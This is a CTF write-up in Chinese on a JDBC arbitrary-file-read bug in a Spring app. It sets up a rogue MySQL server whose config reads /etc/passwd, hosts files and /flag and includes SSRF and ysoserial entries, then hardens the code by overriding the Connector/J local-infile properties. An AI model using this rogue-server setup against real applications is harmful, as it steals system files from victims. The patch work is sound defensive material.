ciscn 东南半决部分复现


jdbc 任意文件读取

Break

app.jar 起本地服务

在 BOOT_INF\lib\mysql-connector-java-8.0.13.jar 内的 com\mysql\cj\protocol\a\NativeProtocol.class 中存在 sendFileToServer 方法

sendFileToServer 会判断 allowUrlInLocalInfile 是否为 true 来开启 load data local infile,

然后将客户端的文件读出并插入表中(这里的客户端指应用服务器,本地起的 jar 包是服务端)

本地起一个MySQL_Fake_Server https://github.com/fnmsd/MySQL_Fake_Server

config.json

{
"config":{
"ysoserialPath":"app.jar", 修改为自己的jar包路径
"javaBinPath":"java",
"fileOutputDir":"./fileOutput/",
"displayFileContentOnScreen":true,
"saveToFile":false 这里关掉了保存输出到文件
},
"fileread":{
"linux_passwd":"/etc/passwd",
"linux_hosts":"/etc/hosts",
"win_ini":"c:\\windows\\win.ini",
"win_hosts":"c:\\windows\\system32\\drivers\\etc\\hosts",
"win":"c:\\windows\\",

"index_php":"index.php",
"ssrf":"https://www.baidu.com/",
"__defaultFiles":["/flag","c:\\windows\\system32\\drivers\\etc\\hosts"]
__defaultFiles 指定要读取的文件,这里选择读取根目录下的 flag 文件
},
"yso":{
"Jdk7u21":["Jdk7u21","calc"]
}
}

这里只需要用到 fileread 部分,其他配置项用不到。

运行server.py

高版本的 Python 运行时会出现问题(这个项目有点久远了)。

这里用的3.8

3.10应该也没问题

让应用去访问对应的 SQL 服务(即上面伪造的 MySQL 服务)即可。

可以看到

FIX

原生 JDBC 场景下,可以使用预先定义的 Properties 覆盖掉 URL 中的属性,从而关闭本地文件读取以及 URL 读取。注意这只挡住了 LOAD DATA LOCAL INFILE 这一条路;如果 JDBC URL 本身由用户控制,更彻底的做法是限制允许连接的地址和可用参数。

使用预先定义的 Properties 将 URL 中的属性覆盖掉,就可以关闭本地文件读取、URL 读取。

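// Example: hardening a plain DriverManager connection against LOAD DATA LOCAL INFILE.
// Connector/J applies an explicitly passed Properties object on top of the URL's
// own query parameters, so the three settings below win even though DB_URL
// still says allowLoadLocalInfile=true.
String driver = "com.mysql.jdbc.Driver";
String DB_URL = "jdbc:mysql://127.0.0.1:3306/test?user=test&maxAllowedPacket=655360&allowLoadLocalInfile=true";
Class.forName(driver);
Properties properties = new Properties();
// The client must not send local files in response to a LOAD DATA LOCAL INFILE request.
properties.setProperty("allowLoadLocalInfile", "false");
// ...nor treat the requested file name as a URL to fetch.
properties.setProperty("allowUrlInLocalInfile", "false");
// Empty path allowlist. This key only exists on newer Connector/J releases; older
// ones are expected to ignore unknown keys — verify on the version in use.
properties.setProperty("allowLoadLocalInfileInPath", "");
Connection conn = DriverManager.getConnection(DB_URL, properties);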

直接修改 org.example.ezawd.services\DatasourceServiceImpl.class

这里用到了如下 Properties:

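// Same override set as in the FIX section: an explicitly passed Properties object
// takes precedence over the URL's query parameters, so this closes
// LOAD DATA LOCAL INFILE even if the URL coming from jdbcBean enables it.
Properties properties = new Properties();
properties.setProperty("allowLoadLocalInfile", "false");
properties.setProperty("allowUrlInLocalInfile", "false");
// Key only present on newer Connector/J releases; presumably ignored by older ones — verify.
properties.setProperty("allowLoadLocalInfileInPath", "");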

// No Properties are passed here, so whatever driver options the URL in jdbcBean carries take effect.
java.sql.Connection pgConnection = DriverManager.getConnection(jdbcBean.getUrl());
PostgresDatasourceConnector postgresDatasourceConnector = new PostgresDatasourceConnector(pgConnection);

对应修改为在获取连接时传入这份配置:
// The Properties object is applied on top of the URL's own parameters before the connection is opened.
java.sql.Connection pgConnection = DriverManager.getConnection(jdbcBean.getUrl(), properties);
PostgresDatasourceConnector postgresDatasourceConnector = new PostgresDatasourceConnector(pgConnection);

修改前

switch (jdbcBean.getType()) {
case 1:
Class.forName((String)config.get("JDBC-MYSQL"));
// Leftover from the example snippet: DB_URL is never used, and `driver` presumably
// re-loads the same driver class the config line above already loaded.
String driver = "com.mysql.jdbc.Driver";
String DB_URL = "jdbc:mysql://127.0.0.1:3306/test?user=test&maxAllowedPacket=655360&allowLoadLocalInfile=true";
Class.forName(driver);
// Vulnerable call: no Properties are passed, so whatever allowLoadLocalInfile /
// allowUrlInLocalInfile values the URL in jdbcBean carries are honoured, and a
// rogue MySQL server can ask this client for local files via LOAD DATA LOCAL INFILE.
MysqlDatasourceConnector mysqlDatasourceConnector = new MysqlDatasourceConnector(DriverManager.getConnection(jdbcBean.getUrl()));

if (jdbcBean.getTableName() != null) {
return mysqlDatasourceConnector.getTableContent(jdbcBean.getTableName());
}

return mysqlDatasourceConnector.getTables();
case 2:
Class.forName((String)config.get("JDBC-POSTGRES"));
// Same pattern for PostgreSQL: connection options come only from the URL.
PostgresDatasourceConnector postgresDatasourceConnector = new PostgresDatasourceConnector(DriverManager.getConnection(jdbcBean.getUrl()));
if (jdbcBean.getTableName() != null) {
return postgresDatasourceConnector.getTableContent(jdbcBean.getTableName());
}

return postgresDatasourceConnector.getTables();

fix后

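// Connector/J lets an explicitly passed Properties object override the same keys
// in the JDBC URL (see the FIX section above), so building it once here disables
// LOAD DATA LOCAL INFILE for every branch even when the URL asks for it.
// Declared before the switch so both cases share one object and the second
// copy (`properties2`) is no longer needed.
// NOTE(review): the URL comes from jdbcBean; if that is request-controlled, an
// allowlist of permitted hosts/parameters would be the more complete fix — confirm.
Properties properties = new Properties();
properties.setProperty("allowLoadLocalInfile", "false");
properties.setProperty("allowUrlInLocalInfile", "false");
// Key only present on newer Connector/J releases; presumably ignored by older ones — verify.
properties.setProperty("allowLoadLocalInfileInPath", "");
switch (jdbcBean.getType()) {
    case 1:
        // The driver class comes from the configuration. The sample-code leftovers
        // (hard-coded driver name and an unused DB_URL that still said
        // allowLoadLocalInfile=true) were dropped as dead code.
        Class.forName((String) config.get("JDBC-MYSQL"));
        MysqlDatasourceConnector mysqlDatasourceConnector =
                new MysqlDatasourceConnector(DriverManager.getConnection(jdbcBean.getUrl(), properties));
        if (jdbcBean.getTableName() != null) {
            return mysqlDatasourceConnector.getTableContent(jdbcBean.getTableName());
        }
        return mysqlDatasourceConnector.getTables();
    case 2:
        Class.forName((String) config.get("JDBC-POSTGRES"));
        // The keys above are Connector/J (MySQL) options; the PostgreSQL driver
        // presumably ignores them, so passing the same object here is harmless,
        // but only the MySQL branch is actually hardened by it — verify.
        PostgresDatasourceConnector postgresDatasourceConnector =
                new PostgresDatasourceConnector(DriverManager.getConnection(jdbcBean.getUrl(), properties));
        if (jdbcBean.getTableName() != null) {
            return postgresDatasourceConnector.getTableContent(jdbcBean.getTableName());
        }
        return postgresDatasourceConnector.getTables();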